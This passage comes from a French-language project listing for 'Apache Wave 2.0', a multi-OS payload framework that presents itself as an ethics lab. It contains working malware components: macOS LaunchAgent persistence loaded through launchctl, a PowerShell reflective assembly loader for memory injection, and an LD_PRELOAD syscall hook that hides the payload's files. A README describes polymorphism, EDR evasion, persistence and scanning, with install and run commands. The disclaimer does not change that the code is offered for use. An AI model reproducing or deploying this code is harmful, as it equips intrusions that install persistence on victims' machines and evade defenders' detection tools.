</plist>"""
with open(os.path.expanduser("~/Library/LaunchAgents/com.apache.wave.plist"), "w") as f:
f.write(plist)
os.system("launchctl load ~/Library/LaunchAgents/com.apache.wave.plist")
1️⃣3️⃣ core/persistence/__init__.py – Gestion Persistance
# core/persistence/__init__.py
from .windows import install as install_windows
from .linux import install as install_linux
from .macos import install as install_macos
def install(os_type):
if os_type == "win":
install_windows(os_type)
elif os_type == "linux":
install_linux(os_type)
elif os_type == "mac":
install_macos(os_type)
1️⃣4️⃣ evasion/memory_injection.py – Injection Mémoire
# evasion/memory_injection.py
import os
import platform
def inject():
if platform.system() == "Windows":
os.system("powershell -Command \"[Reflection.Assembly]::Load([byte[]](0x4D,0x5A,...))\"")
else:
print("Injection mémoire non implémentée pour cet OS.")
1️⃣5️⃣ evasion/syscall_hooking.c – Hook Syscall
// evasion/syscall_hooking.c
#include <stdio.h>
#include <dlfcn.h>
#include <unistd.h>
#include <string.h>
int (*original_open)(const char*, int, ...);
__attribute__((constructor)) void init() {
original_open = dlsym(RTLD_NEXT, "open");
}
int open(const char *path, int flags, ...) {
if (strstr(path, "wave")) {
return -1; // Cache les fichiers wave
}
return original_open(path, flags);
}
# Compiler
gcc -shared -fPIC evasion/syscall_hooking.c -o libhook.so -ldl
# Activer
export LD_PRELOAD=/tmp/libhook.so
1️⃣6️⃣ README.md – Instructions
# Apache Wave 2.0 - Lab Éthique 🐍💾
⚠️ **NE PAS FAIRE EN VRAI**
Lab isolé uniquement (VirtualBox, réseau NAT). Usage non autorisé = 7 ans prison, 100 000 € amende (Art. 323-1 CP). Hackez éthique ! 💖
## 📜 Description
Payload universel, autonome, et user-friendly pour simuler une attaque APT en lab.
- **Compatibilité** : Windows 7→11, Linux 4.4→6.x, macOS 10.15→14, x86_64/ARM.
- **Fonctionnalités** : Polymorphisme, persistance multi-OS, scan adaptatif, chiffrement AES-256, évasion EDR.
- **Simplicité** : Questionnaire interactif, interface CLI stylée, automatisation totale.
## 📁 Structure
/apachewave/
├── apachewave.py # Point d’entrée
├── wave_core.pyx # Payload principal
├── setup.py # Compilation
├── config.ini # Config dynamique
├── autoinstall.sh # Installation
├── run.sh # Lancement
├── healthcheck.py # Diagnostic
├── core/ # Modules principaux
└── evasion/ # Évasion EDR
## 🔰 Prérequis
- **Kali Linux 2024.4** (VM VirtualBox).
- **Lab isolé** : Réseau 172.16.0.0/24.
- **RAM/CPU** : 4GB/2 cores min.
## 🛠 Installation
1. **Crée le dossier** :
```
mkdir -p /home/platon-y/projets/python/pythonSite/apachewave
cd /home/platon-y/projets/python/pythonSite/apachewave
Copie les fichiers: Place tous les fichiers ci-dessus.
Installe:
chmod +x autoinstall.sh ./autoinstall.sh
Lance:
./run.sh
2. **Réponds au questionnaire (IP, port, subnet, debug, clé)** .
Test:
Démo: ./run.sh --demo
Scan: ./run.sh --scan
Persistance: ./run.sh --persist linux
# Rejoins les Apaches: admin@pctamalou.fr pour feedback ! 😈